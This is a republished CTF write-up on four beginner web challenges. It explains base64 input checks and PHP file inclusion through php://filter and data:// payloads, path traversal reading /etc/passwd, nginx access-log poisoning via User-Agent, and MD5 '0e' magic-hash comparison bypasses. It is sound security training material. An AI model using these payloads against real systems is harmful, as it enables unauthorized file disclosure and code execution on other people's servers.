我的编程空间,编程开发者的网络收藏夹
学习永远不晚

[青少年CTF]Web-CheckMe01-04 writeup by q1jun

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

[青少年CTF]Web-CheckMe01-04 writeup by q1jun

0x01 CheckMe01

进入环境,随意输入字符:

image-20221002121613125

看一下代码,发现$keys = base64_decode(urldecode($keys));

说明需要先将qsnctf字符进行base64编码才能使$keys=="qsnctf"判断成立。

image-20221002121753174

所以输入:

cXNuY3Rm

得到flag

image-20221002121844048

0x02 CheckMe02

打开题目的环境,发现是文件包含题:

image-20221002122324748

通过

?url=php://filter/read=convert.base64-encode/resource=index.php

php伪协议可以查看到index.php的源码的base64:

PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==

解码得到:

<title>CheckMe-02</title>print("

欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。

"
);?>error_reporting(0);$url=$_GET['url'];if(isset($url)){ include($url);}?><html lang="zh-CN"> $code="."_GET['url']);?>"; highlight_string($code); ?>

可以看出并没有做任何过滤,试试读取phpinfo():

?url=data:text/plain,<?php phpinfo();?>

image-20221002122920746

直接读取到FLAG。

0x03 CheckMe03

打开题目环境:

image-20221002123524270

还是文件包含题目,相比于CheckMe02这题把php伪协议过滤了。

但是还是可以读取到文件,比如/etc/passwd

?text=../../../etc/passwd

image-20221002123739090

那说明还可以通过日志来解析PHP语句。

根据nginx配置文件:

?text=../../../etc/nginx/nginx.conf

image-20221002123900075

可以推测access.log文件所在位置为/var/log/nginx/access.log,这个日志文件会记录http请求日志:

?text=../../../var/log/nginx/access.log

image-20221002124036248

所以通过发送一个包含语句的http请求来写入access.log文件,这里就要用到burpsuite来拦截请求包,修改里面的User-Agent字段:

image-20221002124529654

然后再通过文件包含漏洞访问access.log日志文件:

image-20221002124615125

找到FLAG

image-20221002124646399

0x04 CheckMe04

打开题目环境:

image-20221002125008667

分析一下这段代码,变量a只能为字母,b只能为数字,然后他们各自的MD5值如果想等就输出flag。

这里通过0e截断可以做到,因为0e在是科学计数的语法,0e后面不管多大都是0

所以只需要找到两个0e开头的md5就行了

但不要忘了a只能是字母,b只能是数字:

a = QNKCDZO

md5(a) = 0e830400451993494058024219903391

b = 240610708

md5(b) = 0e462097431906509019562988736854

所以Payload:

http://xxx/?a=QNKCDZO&b=240610708

image-20221002125712512

来源地址:https://blog.csdn.net/ShangYaoPaiGu/article/details/128090156

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

[青少年CTF]Web-CheckMe01-04 writeup by q1jun

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录